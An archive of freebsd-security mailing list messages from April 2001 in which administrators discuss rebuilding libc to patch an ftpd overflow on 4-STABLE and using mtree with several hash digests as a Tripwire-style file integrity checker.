protocol="application/pgp-signature"; boundary="/WwmFnJnmDyWGHa4" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ADF8C73.7E987982@packeteer.com>; from briant@packeteer.com on Thu, Apr 19, 2001 at 06:10:11PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --/WwmFnJnmDyWGHa4 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Thu, Apr 19, 2001 at 06:10:11PM -0700, Brian Tiemann wrote: > Well, that's great, but something needs to be looked at for those of us > tracking 4-STABLE. Thanks... If you're tracking -stable, why not just cvsup? We can't possibly test the patches with every possible different point on the RELENG_4 continuum, so we kind of assume that if you've cvsupped once to get to a non-release version of -stable you can do it again. Having said that, I can't think of any differences in libc which would have caused this to fail between 4.2-REL and some later version of 4.2-STABLE. Kris --/WwmFnJnmDyWGHa4 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6342SWry0BWjoQKURAqMHAKDnR1+uf3Il1e9vEyqzCU4c1pOFNQCgg5T8 ZwpmPsdSaJ+wQJsghpOA1H4= =d9je -----END PGP SIGNATURE----- --/WwmFnJnmDyWGHa4-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 18:20:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from urdvg002.cms.usa.net (urdvg002.cms.usa.net [165.212.11.2]) by hub.freebsd.org (Postfix) with SMTP id E242737B424 for ; Thu, 19 Apr 2001 18:20:09 -0700 (PDT) (envelope-from briant@packeteer.com) Received: (qmail 25327 invoked from network); 20 Apr 2001 01:20:09 -0000 Received: from uadvg128.cms.usa.net (165.212.11.128) by corprelay.cms.usa.net with SMTP; 20 Apr 2001 01:20:09 -0000 Received: (qmail 13496 invoked by uid 0); 20 Apr 2001 01:20:08 -0000 Received: USA.NET MXFirewall, messaging filters applied; Fri, 20 Apr 2001 01:20:07 GMT Received: from packeteer.com [207.78.98.2] by uadvg128 (ASMTP/briant@postoffice.packeteer.com) via mtad (53CM.0401.1.03) with ESMTP id 068FDTBuc0204M16; Fri, 20 Apr 2001 01:20:03 GMT Message-ID: <3ADF8EFB.1B6EBA04@packeteer.com> Date: Thu, 19 Apr 2001 18:20:59 -0700 From: Brian Tiemann Organization: Packeteer, Inc. X-Mailer: Mozilla 4.74 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Rob Simmons , Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG Subject: Re: Another glob problem References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> <20010419181459.B57373@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes, I cvsupped immediately before rebuilding. That's the entire problem. The current best attempt has been to remove /usr/src and /usr/obj, cvsup to checkout a fresh 4-STABLE tree as of this afternoon, and try to build libc. But that's not working. So while what's causing libc to not compile is probably not related to the patch, what it means is that we're all effectively left without a solution to the ftpd overflow problem until the build error in mpool.c is dealt with. I cvsup 4-STABLE every night. I sort of thought that was what "tracking -STABLE" meant. It's so I don't have to worry about downloading patches. Brian Kris Kennaway wrote: > > On Thu, Apr 19, 2001 at 06:10:11PM -0700, Brian Tiemann wrote: > > Well, that's great, but something needs to be looked at for those of us > > tracking 4-STABLE. Thanks... > > If you're tracking -stable, why not just cvsup? We can't possibly > test the patches with every possible different point on the RELENG_4 > continuum, so we kind of assume that if you've cvsupped once to get to > a non-release version of -stable you can do it again. Having said > that, I can't think of any differences in libc which would have caused > this to fail between 4.2-REL and some later version of 4.2-STABLE. > > Kris > > ------------------------------------------------------------------------ > Part 1.2Type: application/pgp-signature To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 18:31:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 8BBCA37B424 for ; Thu, 19 Apr 2001 18:31:26 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id E70B966B38; Thu, 19 Apr 2001 18:31:25 -0700 (PDT) Date: Thu, 19 Apr 2001 18:31:25 -0700 From: Kris Kennaway To: Brian Tiemann Cc: Kris Kennaway , Rob Simmons , Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG Subject: Re: Another glob problem Message-ID: <20010419183125.A57696@xor.obsecurity.org> References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> <20010419181459.B57373@xor.obsecurity.org> <3ADF8EFB.1B6EBA04@packeteer.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="dDRMvlgZJXvWKvBx" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ADF8EFB.1B6EBA04@packeteer.com>; from briant@packeteer.com on Thu, Apr 19, 2001 at 06:20:59PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --dDRMvlgZJXvWKvBx Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 06:20:59PM -0700, Brian Tiemann wrote: > Yes, I cvsupped immediately before rebuilding. That's the entire > problem. >=20 > The current best attempt has been to remove /usr/src and /usr/obj, > cvsup to checkout a fresh 4-STABLE tree as of this afternoon, and try to > build libc. But that's not working. So while what's causing libc to not > compile is probably not related to the patch, what it means is that > we're all effectively left without a solution to the ftpd overflow > problem until the build error in mpool.c is dealt with. There is no build error in libc in RELENG_4 (my installworld is installworlding as I type). Are you making world, or trying to compile by hand? If you do a complete cvsup you can't use the instructions in the advisory because they assume that the only things which have changed are those in the patch; if you cvsup, then a lot of other stuff may change which requires nontrivial hoop-jumping, which is taken care of by make world and the usual upgrade procedure. Kris --dDRMvlgZJXvWKvBx Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE635FtWry0BWjoQKURAsD0AKCAhvH924HAMB87bZufZtNmH+QRMgCg121w LYrfxlEEtPJQea9xlAbRA24= =LqlQ -----END PGP SIGNATURE----- --dDRMvlgZJXvWKvBx-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 18:36:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from uadvg134.cms.usa.net (uadvg134.cms.usa.net [165.212.11.134]) by hub.freebsd.org (Postfix) with SMTP id 5F6F537B422 for ; Thu, 19 Apr 2001 18:36:40 -0700 (PDT) (envelope-from briant@packeteer.com) Received: (qmail 18393 invoked from network); 20 Apr 2001 01:36:39 -0000 Received: from uadvg129.cms.usa.net (165.212.11.129) by corprelay.cms.usa.net with SMTP; 20 Apr 2001 01:36:39 -0000 Received: (qmail 7033 invoked by uid 0); 20 Apr 2001 01:36:39 -0000 Received: USA.NET MXFirewall, messaging filters applied; Fri, 20 Apr 2001 01:36:38 GMT Received: from packeteer.com [207.78.98.2] by uadvg129 (ASMTP/briant@postoffice.packeteer.com) via mtad (53CM.0401.1.03) with ESMTP id 561FDTBKK0390M20; Fri, 20 Apr 2001 01:36:37 GMT Message-ID: <3ADF92DC.2B5A941D@packeteer.com> Date: Thu, 19 Apr 2001 18:37:32 -0700 From: Brian Tiemann Organization: Packeteer, Inc. X-Mailer: Mozilla 4.74 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Rob Simmons , Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG Subject: Re: Another glob problem References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> <20010419181459.B57373@xor.obsecurity.org> <3ADF8EFB.1B6EBA04@packeteer.com> <20010419183125.A57696@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm just trying to compile /usr/src/lib/libc. I suppose that's not going to work-- a make world will be indicated. Which really sucks for a production server. Yikes. And we were so close to making it to 4.3-RELEASE without an interim build... Brian Kris Kennaway wrote: > > On Thu, Apr 19, 2001 at 06:20:59PM -0700, Brian Tiemann wrote: > > Yes, I cvsupped immediately before rebuilding. That's the entire > > problem. > > > > The current best attempt has been to remove /usr/src and /usr/obj, > > cvsup to checkout a fresh 4-STABLE tree as of this afternoon, and try to > > build libc. But that's not working. So while what's causing libc to not > > compile is probably not related to the patch, what it means is that > > we're all effectively left without a solution to the ftpd overflow > > problem until the build error in mpool.c is dealt with. > > There is no build error in libc in RELENG_4 (my installworld is > installworlding as I type). > > Are you making world, or trying to compile by hand? If you do a > complete cvsup you can't use the instructions in the advisory because > they assume that the only things which have changed are those in the > patch; if you cvsup, then a lot of other stuff may change which > requires nontrivial hoop-jumping, which is taken care of by make world > and the usual upgrade procedure. > > Kris > > ------------------------------------------------------------------------ > Part 1.2Type: application/pgp-signature To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 18:41: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 53D5D37B422 for ; Thu, 19 Apr 2001 18:41:00 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f3K1fQa84146; Thu, 19 Apr 2001 21:41:26 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Thu, 19 Apr 2001 21:41:22 -0400 (EDT) From: Rob Simmons To: Brian Tiemann Cc: Kris Kennaway , Ben Vaughn , Chris Faulhaber , Subject: Re: Another glob problem In-Reply-To: <3ADF8EFB.1B6EBA04@packeteer.com> Message-ID: <20010419213925.S83948-100000@mail.wlcg.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Make sure that you remove everything below /usr/sup/src-all/ There should be a file there called checkouts.cvs that could hose up a fresh checkout. Robert Simmons Systems Administrator http://www.wlcg.com/ On Thu, 19 Apr 2001, Brian Tiemann wrote: > Yes, I cvsupped immediately before rebuilding. That's the entire > problem. > > The current best attempt has been to remove /usr/src and /usr/obj, > cvsup to checkout a fresh 4-STABLE tree as of this afternoon, and try to > build libc. But that's not working. So while what's causing libc to not > compile is probably not related to the patch, what it means is that > we're all effectively left without a solution to the ftpd overflow > problem until the build error in mpool.c is dealt with. > > I cvsup 4-STABLE every night. I sort of thought that was what "tracking > -STABLE" meant. It's so I don't have to worry about downloading patches. > > Brian > > > Kris Kennaway wrote: > > > > On Thu, Apr 19, 2001 at 06:10:11PM -0700, Brian Tiemann wrote: > > > Well, that's great, but something needs to be looked at for those of us > > > tracking 4-STABLE. Thanks... > > > > If you're tracking -stable, why not just cvsup? We can't possibly > > test the patches with every possible different point on the RELENG_4 > > continuum, so we kind of assume that if you've cvsupped once to get to > > a non-release version of -stable you can do it again. Having said > > that, I can't think of any differences in libc which would have caused > > this to fail between 4.2-REL and some later version of 4.2-STABLE. > > > > Kris > > > > ------------------------------------------------------------------------ > > Part 1.2Type: application/pgp-signature > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE635PGv8Bofna59hYRAy1gAJ0bPosUHIAVItNcyQ1wmk7rZvXHnACeK1a1 z6/tCKdyZo19UrSbvaCaxck= =z8cs -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 19:47:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 37F6437B423 for ; Thu, 19 Apr 2001 19:47:15 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id C6A6766B38; Thu, 19 Apr 2001 19:47:10 -0700 (PDT) Date: Thu, 19 Apr 2001 19:47:10 -0700 From: Kris Kennaway To: Brian Tiemann Cc: Kris Kennaway , Rob Simmons , Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG Subject: Re: Another glob problem Message-ID: <20010419194710.A58378@xor.obsecurity.org> References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> <20010419181459.B57373@xor.obsecurity.org> <3ADF8EFB.1B6EBA04@packeteer.com> <20010419183125.A57696@xor.obsecurity.org> <3ADF92DC.2B5A941D@packeteer.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="opJtzjQTFsWo+cga" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ADF92DC.2B5A941D@packeteer.com>; from briant@packeteer.com on Thu, Apr 19, 2001 at 06:37:32PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --opJtzjQTFsWo+cga Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 06:37:32PM -0700, Brian Tiemann wrote: > I'm just trying to compile /usr/src/lib/libc. I suppose that's not > going to work-- a make world will be indicated. Which really sucks for a > production server. >=20 > Yikes. And we were so close to making it to 4.3-RELEASE without an > interim build... That's the trade-off you make when you cvsup -stable. If you have lots of machines to update, or (sensibly) want to test it before deploying on your production systems, just build world + test one a scratch machine, then installworld via NFS on the target servers. Kris --opJtzjQTFsWo+cga Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE636MuWry0BWjoQKURAhWBAKCcR9eiXlwMwr9zGdOU6a2hgPeNCgCbBItd dgWDa0tuWKi5HczZwU6alsE= =ID9c -----END PGP SIGNATURE----- --opJtzjQTFsWo+cga-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 19:59:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (skin-flute.com [64.3.150.188]) by hub.freebsd.org (Postfix) with ESMTP id 2AFBC37B42C for ; Thu, 19 Apr 2001 19:59:15 -0700 (PDT) (envelope-from geniusj@bluenugget.net) Received: from skinflutei32jg (windows.box [64.3.150.191]) by bluenugget.net (Postfix) with ESMTP id 731A31377E; Thu, 19 Apr 2001 20:01:53 -0700 (PDT) Message-ID: <00d301c0c946$b05c8140$bf960340@skinflutei32jg> From: "Jason DiCioccio" To: "Emre Bastuz" , References: <3ADF3CCC.FB8498DC@emre.de> Subject: Re: Tripwire or the like for FreeBSD ? Date: Thu, 19 Apr 2001 20:05:00 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2462.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org couldn't you could easily hack something up using mtree? ----- Original Message ----- From: "Emre Bastuz" To: Sent: Thursday, April 19, 2001 12:30 PM Subject: Tripwire or the like for FreeBSD ? > Hi, > > I was just wondering if there is Tripwire for FreeBSD or some decent tool > that has similar/better functionality ? > > The Tripwire homepage seems to bee pretty commercial and lacks a BSD > version (they seem to be focused on Linux). > > I found something called "Aide" in the ports directory, but to be honest - > I don´t trust a "Version 0.7" when it comes to security. > > Does anyone know any alternative ? > > Regards, > > Emre > > -- > Emre Bastuz > info@emre.de http://www.emre.de > UIN: 561260 PGP Key ID: 0xAFAC77FD > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 20: 7:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 8E59737B423 for ; Thu, 19 Apr 2001 20:07:26 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f3K37LL85663; Thu, 19 Apr 2001 23:07:21 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Thu, 19 Apr 2001 23:07:16 -0400 (EDT) From: Rob Simmons To: Jason DiCioccio Cc: Emre Bastuz , Subject: Re: Tripwire or the like for FreeBSD ? In-Reply-To: <00d301c0c946$b05c8140$bf960340@skinflutei32jg> Message-ID: <20010419230519.F85568-100000@mail.wlcg.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Please do :) http://www.freebsd.org/doc/en_US.ISO_8859-1/books/handbook/contrib.html#CON= TRIB-WHAT See #6 in High priority tasks. Robert Simmons Systems Administrator http://www.wlcg.com/ On Thu, 19 Apr 2001, Jason DiCioccio wrote: > couldn't you could easily hack something up using mtree? > ----- Original Message ----- > From: "Emre Bastuz" > To: > Sent: Thursday, April 19, 2001 12:30 PM > Subject: Tripwire or the like for FreeBSD ? > > > > Hi, > > > > I was just wondering if there is Tripwire for FreeBSD or some decent to= ol > > that has similar/better functionality ? > > > > The Tripwire homepage seems to bee pretty commercial and lacks a BSD > > version (they seem to be focused on Linux). > > > > I found something called "Aide" in the ports directory, but to be hones= t - > > I don=B4t trust a "Version 0.7" when it comes to security. > > > > Does anyone know any alternative ? > > > > Regards, > > > > Emre > > > > -- > > Emre Bastuz > > info@emre.de http://www.emre.de > > UIN: 561260 PGP Key ID: 0xAFAC77FD > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE636fov8Bofna59hYRA3fnAKDBzE+dCxBb6ZZc0rRyLSF7E0ISCQCghL23 wQIM9wTnvZQPigab/oZYpZI=3D =3DlQWF -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 20:18: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from backup.af.speednet.com.au (af.speednet.com.au [202.135.188.244]) by hub.freebsd.org (Postfix) with ESMTP id 4A30237B422 for ; Thu, 19 Apr 2001 20:17:52 -0700 (PDT) (envelope-from andyf@speednet.com.au) Received: from backup.af.speednet.com.au (backup.af.speednet.com.au [172.22.2.4]) by backup.af.speednet.com.au (8.11.3/8.11.3) with ESMTP id f3K3Gtc14728; Fri, 20 Apr 2001 13:16:55 +1000 (EST) (envelope-from andyf@speednet.com.au) Date: Fri, 20 Apr 2001 13:16:54 +1000 (EST) From: Andy Farkas X-X-Sender: To: Rob Simmons Cc: Jason DiCioccio , Emre Bastuz , Subject: Re: Tripwire or the like for FreeBSD ? In-Reply-To: <20010419230519.F85568-100000@mail.wlcg.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Search the -security mailing list for "alternative tripwire options" and you'll find a message by Garrett Wollman that says: > In any event, try (in 5-current and 4-stable): > > =09# mtree -ciK md5digest,sha1digest,ripemd160digest -p / \ > =09> >my.file.list > > To check, use: > > =09# mtree -p / my.file.list > > You will probably find a significant number of files which are > expected to change; you'll want to list these in a separate file and > regenerate the list using the `-X' option. (You'll then also want to > check the list using the same option.) At some point, I'll try to > come up with a list which could serve as a starting point. On Thu, 19 Apr 2001, Rob Simmons wrote: > Please do :) > > http://www.freebsd.org/doc/en_US.ISO_8859-1/books/handbook/contrib.html#C= ONTRIB-WHAT > > See #6 in High priority tasks. > > Robert Simmons > Systems Administrator > http://www.wlcg.com/ > > On Thu, 19 Apr 2001, Jason DiCioccio wrote: > > > couldn't you could easily hack something up using mtree? > > ----- Original Message ----- > > From: "Emre Bastuz" > > To: > > Sent: Thursday, April 19, 2001 12:30 PM > > Subject: Tripwire or the like for FreeBSD ? > > > > > > > Hi, > > > > > > I was just wondering if there is Tripwire for FreeBSD or some decent = tool > > > that has similar/better functionality ? > > > > > > The Tripwire homepage seems to bee pretty commercial and lacks a BSD > > > version (they seem to be focused on Linux). > > > > > > I found something called "Aide" in the ports directory, but to be hon= est - > > > I don=B4t trust a "Version 0.7" when it comes to security. > > > > > > Does anyone know any alternative ? > > > > > > Regards, > > > > > > Emre > > > > > > -- > > > Emre Bastuz > > > info@emre.de http://www.emre.de > > > UIN: 561260 PGP Key ID: 0xAFAC77FD > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.4 (FreeBSD) > Comment: For info see http://www.gnupg.org > > iD8DBQE636fov8Bofna59hYRA3fnAKDBzE+dCxBb6ZZc0rRyLSF7E0ISCQCghL23 > wQIM9wTnvZQPigab/oZYpZI=3D > =3DlQWF > -----END PGP SIGNATURE----- > > -- :{ andyf@speednet.com.au Andy Farkas System Administrator Speednet Communications http://www.speednet.com.au/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 20:29:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id E17B537B422 for ; Thu, 19 Apr 2001 20:29:47 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f3K3TVN86078; Thu, 19 Apr 2001 23:29:32 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Thu, 19 Apr 2001 23:29:27 -0400 (EDT) From: Rob Simmons To: Andy Farkas Cc: Jason DiCioccio , Emre Bastuz , Subject: Re: Tripwire or the like for FreeBSD ? In-Reply-To: Message-ID: <20010419232353.R85568-100000@mail.wlcg.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Is there a reason to use md5, sha1, and ripemd160 together? I would think ripemd160digest alone would be sufficient. Also, burning the output of that to a CD is a pretty good way to prevent tampering. Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 20 Apr 2001, Andy Farkas wrote: > > Search the -security mailing list for "alternative tripwire options" and > you'll find a message by Garrett Wollman that says: > > > In any event, try (in 5-current and 4-stable): > > > > =09# mtree -ciK md5digest,sha1digest,ripemd160digest -p / \ > > =09> >my.file.list > > > > To check, use: > > > > =09# mtree -p / my.file.list > > > > You will probably find a significant number of files which are > > expected to change; you'll want to list these in a separate file and > > regenerate the list using the `-X' option. (You'll then also want to > > check the list using the same option.) At some point, I'll try to > > come up with a list which could serve as a starting point. > > > On Thu, 19 Apr 2001, Rob Simmons wrote: > > > Please do :) > > > > http://www.freebsd.org/doc/en_US.ISO_8859-1/books/handbook/contrib.html= #CONTRIB-WHAT > > > > See #6 in High priority tasks. > > > > Robert Simmons > > Systems Administrator > > http://www.wlcg.com/ > > > > On Thu, 19 Apr 2001, Jason DiCioccio wrote: > > > > > couldn't you could easily hack something up using mtree? > > > ----- Original Message ----- > > > From: "Emre Bastuz" > > > To: > > > Sent: Thursday, April 19, 2001 12:30 PM > > > Subject: Tripwire or the like for FreeBSD ? > > > > > > > > > > Hi, > > > > > > > > I was just wondering if there is Tripwire for FreeBSD or some decen= t tool > > > > that has similar/better functionality ? > > > > > > > > The Tripwire homepage seems to bee pretty commercial and lacks a BS= D > > > > version (they seem to be focused on Linux). > > > > > > > > I found something called "Aide" in the ports directory, but to be h= onest - > > > > I don=B4t trust a "Version 0.7" when it comes to security. > > > > > > > > Does anyone know any alternative ? > > > > > > > > Regards, > > > > > > > > Emre > > > > > > > > -- > > > > Emre Bastuz > > > > info@emre.de http://www.emre.de > > > > UIN: 561260 PGP Key ID: 0xAFAC77FD > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > > > > > > -----BEGIN PGP SIGNATURE----- > > Version: GnuPG v1.0.4 (FreeBSD) > > Comment: For info see http://www.gnupg.org > > > > iD8DBQE636fov8Bofna59hYRA3fnAKDBzE+dCxBb6ZZc0rRyLSF7E0ISCQCghL23 > > wQIM9wTnvZQPigab/oZYpZI=3D > > =3DlQWF > > -----END PGP SIGNATURE----- > > > > > > -- > > :{ andyf@speednet.com.au > > Andy Farkas > System Administrator > Speednet Communications > http://www.speednet.com.au/ > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6360bv8Bofna59hYRAxraAJ4rfOczD5fDvOi4nqUFvA/TpP49RgCeLhQM tvlbZM+AMyY0bdyRwhiALIY=3D =3DUbCU -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 20:33:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 0329337B423 for ; Thu, 19 Apr 2001 20:33:54 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id XAA44812; Thu, 19 Apr 2001 23:33:39 -0400 (EDT) (envelope-from wollman) Date: Thu, 19 Apr 2001 23:33:39 -0400 (EDT) From: Garrett Wollman Message-Id: <200104200333.XAA44812@khavrinen.lcs.mit.edu> To: Rob Simmons Cc: freebsd-security@FreeBSD.ORG Subject: Re: Tripwire or the like for FreeBSD ? In-Reply-To: <20010419232353.R85568-100000@mail.wlcg.com> References: <20010419232353.R85568-100000@mail.wlcg.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Is there a reason to use md5, sha1, and ripemd160 together? I would think > ripemd160digest alone would be sufficient. Of course. If someone breaks one of the crypto hash algorithms, it is likely that the discovery will not be immediately applicable to other algorithms, so the other checksums will still be of some value. (Hmmm. I wonder how susceptible these hash algorithms are to quantum computation...?) -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 20:46:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 8DFCA37B424 for ; Thu, 19 Apr 2001 20:46:42 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f3K3kBe86404; Thu, 19 Apr 2001 23:46:11 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Thu, 19 Apr 2001 23:46:07 -0400 (EDT) From: Rob Simmons To: Garrett Wollman Cc: Subject: Re: Tripwire or the like for FreeBSD ? In-Reply-To: <200104200333.XAA44812@khavrinen.lcs.mit.edu> Message-ID: <20010419234434.S86364-100000@mail.wlcg.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 That is true. Maybe in the interest of lower overhead two algorithms could be used. Drop md5? Robert Simmons Systems Administrator http://www.wlcg.com/ On Thu, 19 Apr 